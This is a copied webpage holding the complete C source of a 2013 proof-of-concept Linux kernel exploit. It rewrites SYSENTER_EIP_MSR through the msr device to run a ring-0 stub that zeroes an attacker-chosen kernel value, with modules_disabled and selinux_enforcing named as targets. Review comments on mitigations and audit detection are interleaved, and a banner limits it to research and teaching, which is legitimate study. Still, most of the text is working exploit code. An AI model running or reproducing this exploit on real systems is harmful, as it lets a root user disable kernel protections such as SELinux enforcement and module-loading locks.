本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

  1. // PoC exploit for /dev/cpu/*/msr, 32bit userland on a 64bit host
  2. // can do whatever in the commented area, re-enable module support, etc
  3. // requires CONFIG_X86_MSR and just uid 0
  4. // a small race exists between the time when the MSR is written to the first
  5. // time and when we issue our sysenter
  6. // we additionally require CAP_SYS_NICE to make the race win nearly guaranteed
  7. // configured to take a hex arg of a dword pointer to set to 0
  8. // (modules_disabled, selinux_enforcing, take your pick)
  9. //
  10. // Hello to Red Hat, who has shown yet again to not care until a
  11. // public exploit is released. Not even a bugtraq entry existed in
  12. // their system until this was published -- and they have a paid team
  13. // of how many?
  14. // It's not as if I didn't mention the problem and existence of an easy
  15. // exploit multiple times prior:
  16. // https://twitter.com/grsecurity/status/298977370776432640
  17. // https://twitter.com/grsecurity/status/297365303095078912
  18. // https://twitter.com/grsecurity/status/297189488638181376
  19. // https://twitter.com/grsecurity/status/297030133628416000
  20. // https://twitter.com/grsecurity/status/297029470072745984
  21. // https://twitter.com/grsecurity/status/297028324134359041
  22. //
  23. // spender 2013
  24. #define _GNU_SOURCE
  25. #include<stdio.h>
  26. #include<sched.h>
  27. #include<unistd.h>
  28. #include<sys/types.h>
  29. #include<sys/stat.h>
  30. #include<fcntl.h>
  31. #include<stdlib.h>
  32. #include<sys/time.h>
  33. #include<sys/resource.h>
  34. #include<sys/mman.h>
  35. #define SYSENTER_EIP_MSR 0x176
  // Shared state between main() and the _ring0 stub. The stub reaches these only
  // through the register values main() loads immediately before sysenter.
  // msr: original SYSENTER_EIP_MSR value, filled by the read() in main().
  36. u_int64_t msr;
  // ourstack: buffer whose address main() places in ecx; _ring0 copies ecx into esp.
  37. unsignedlong ourstack[65536];
  // payload_data[0] = original MSR value (restored by _ring0 with wrmsr),
  // payload_data[1] = address parsed from argv[1], or 0 when no argument is given.
  38. u_int64_t payload_data[16];
  // _ring0 / _ring0_end: labels emitted by the inline assembly inside ring0(); they
  // bracket the stub that the rewritten MSR points at.
  39. externvoid*_ring0;
  40. externvoid*_ring0_end;
  // Container for the 64-bit stub labelled _ring0 .. _ring0_end. ring0() is never
  // called as a C function in this file; main() writes the address of _ring0 into
  // SYSENTER_EIP_MSR, so the CPU starts executing at that label on sysenter.
  // Register contract, set up by the inline asm in main():
  //   ecx = address of ourstack, edx = address of label2, ebx = address of payload_data.
  // NOTE(review): the stub lives in a user-space mapping of this process, so the
  // technique depends on the kernel-mode CPU being allowed to fetch instructions
  // from user pages. With SMEP enabled that fetch should fault -- confirm on the
  // target platform when assessing exposure.
  41. void ring0(void)
  42. {
  43. __asm volatile(".globl _ring0\n"
  44. "_ring0:\n"
  45. ".intel_syntax noprefix\n"
  46. ".code64\n"
  47. // set up stack pointer with 'ourstack'
  48. "mov esp, ecx\n"
  49. // save registers, contains the original MSR value
  50. "push rax\n"
  51. "push rbx\n"
  52. "push rcx\n"
  53. "push rdx\n"
  54. // play with the kernel here with interrupts disabled!
  // rbx+8 is payload_data[1]; when it is non-zero the dword it points at is set
  // to 0. This single write is the whole payload; the header names
  // modules_disabled and selinux_enforcing as example targets.
  55. "mov rcx, qword ptr [rbx+8]\n"
  56. "test rcx, rcx\n"
  57. "jz skip_write\n"
  58. "mov dword ptr [rcx], 0\n"
  59. "skip_write:\n"
  60. // restore MSR value before returning
  // eax:edx are loaded with the low and high dwords of payload_data[0], the value
  // main() read from the device before overwriting it.
  61. "mov ecx, 0x176\n"// SYSENTER_EIP_MSR
  62. "mov eax, dword ptr [rbx]\n"
  63. "mov edx, dword ptr [rbx+4]\n"
  64. "wrmsr\n"
  // The pops put back the rdx/rcx values main() supplied (label2 and ourstack)
  // before interrupts are re-enabled and sysexit returns to user mode.
  65. "pop rdx\n"
  66. "pop rcx\n"
  67. "pop rbx\n"
  68. "pop rax\n"
  69. "sti\n"
  70. "sysexit\n"
  71. ".code32\n"
  72. ".att_syntax prefix\n"
  73. ".global _ring0_end\n"
  74. "_ring0_end:\n"
  75. );
  76. }
  // User-mode esp, stored by main()'s inline asm just before sysenter and reloaded
  // at label2 once the stub has returned.
  77. unsignedlong saved_stack;
  // Entry point of the PoC. Reads the current SYSENTER_EIP_MSR value through the
  // msr character device, replaces it with the address of _ring0, then executes
  // sysenter so that the CPU enters _ring0.
  // argv[1] (optional) is parsed as a hex address and stored in payload_data[1];
  // _ring0 zeroes the dword at that address when it is non-zero.
  // Returns 0 after printing "Success."; exits with status 1 when the scheduler
  // setup or any open/read/write on the msr device fails.
  // NOTE(review): the only access control this code meets is the open() of the
  // device node; per the file header it needs uid 0 and nothing else. Kernels
  // that check CAP_SYS_RAWIO when the msr device is opened, that run in lockdown
  // mode, or that do not build or load the msr driver should stop it at the open()
  // or the write() -- confirm against the deployed kernel.
  // NOTE(review): for detection, read-write opens of /dev/cpu/*/msr or /dev/msr0
  // and a switch to SCHED_FIFO priority 99 by an unexpected process are both
  // events an audit rule can record.
  78. int main(int argc,char*argv[])
  79. {
  80. cpu_set_tset;
  81. int msr_fd;
  82. int ret;
  83. u_int64_t new_msr;
  84. struct sched_param sched;
  85. u_int64_t resolved_addr =0ULL;
  // Optional target address; strtoull() errors are not checked, so an unparsable
  // argument yields 0 and the stub skips its write.
  86. if(argc ==2)
  87. resolved_addr = strtoull(argv[1], NULL,16);
  88. /* can do this without privilege */
  // Locks the stub and its data in memory; the mlock() return values are ignored.
  89. mlock(_ring0,(unsignedlong)_ring0_end -(unsignedlong)_ring0);
  90. mlock(&payload_data,sizeof(payload_data));
  // Pin to CPU 0 with the highest SCHED_FIFO priority. The header states this is
  // what needs CAP_SYS_NICE and that it narrows the window between the MSR write
  // and the sysenter below.
  91. CPU_ZERO(&set);
  92. CPU_SET(0,&set);
  93. sched.sched_priority =99;
  94. ret = sched_setscheduler(0, SCHED_FIFO,&sched);
  95. if(ret){
  96. fprintf(stderr,"Unable to set priority.\n");
  97. exit(1);
  98. }
  99. ret = sched_setaffinity(0,sizeof(cpu_set_t),&set);
  100. if(ret){
  101. fprintf(stderr,"Unable to set affinity.\n");
  102. exit(1);
  103. }
  // Open CPU 0's msr device read-write, falling back to the /dev/msr0 node name.
  104. msr_fd = open("/dev/cpu/0/msr", O_RDWR);
  105. if(msr_fd <0){
  106. msr_fd = open("/dev/msr0", O_RDWR);
  107. if(msr_fd <0){
  108. fprintf(stderr,"Unable to open /dev/cpu/0/msr\n");
  109. exit(1);
  110. }
  111. }
  // The file offset selects the MSR number; lseek()'s return value is not checked.
  112. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  113. ret = read(msr_fd,&msr,sizeof(msr));
  114. if(ret !=sizeof(msr)){
  115. fprintf(stderr,"Unable to read /dev/cpu/0/msr\n");
  116. exit(1);
  117. }
  118. // stuff some addresses in a buffer whose address we
  119. // pass to the "kernel" via register
  120. payload_data[0]= msr;
  121. payload_data[1]= resolved_addr;
  122. printf("Old SYSENTER_EIP_MSR = %016llx\n", msr);
  123. fflush(stdout);
  // Overwrite the MSR with the address of _ring0. From this write until the stub
  // restores the saved value, every sysenter on CPU 0 is redirected there.
  124. lseek(msr_fd, SYSENTER_EIP_MSR, SEEK_SET);
  125. new_msr =(u_int64_t)(unsignedlong)&_ring0;
  126. printf("New SYSENTER_EIP_MSR = %016llx\n", new_msr);
  127. fflush(stdout);
  128. ret = write(msr_fd,&new_msr,sizeof(new_msr));
  129. if(ret !=sizeof(new_msr)){
  130. fprintf(stderr,"Unable to modify /dev/cpu/0/msr\n");
  131. exit(1);
  132. }
  // Save the user stack pointer, load the register contract the stub expects
  // (ecx = ourstack, edx = label2, ebx = payload_data) and issue sysenter.
  // Execution resumes at label2, where the saved stack pointer is reloaded.
  133. __asm volatile(
  134. ".intel_syntax noprefix\n"
  135. ".code32\n"
  136. "mov saved_stack, esp\n"
  137. "lea ecx, ourstack\n"
  138. "lea edx, label2\n"
  139. "lea ebx, payload_data\n"
  140. "sysenter\n"
  141. "label2:\n"
  142. "mov esp, saved_stack\n"
  143. ".att_syntax prefix\n"
  144. );
  145. printf("Success.\n");
  146. return0;
  147. }
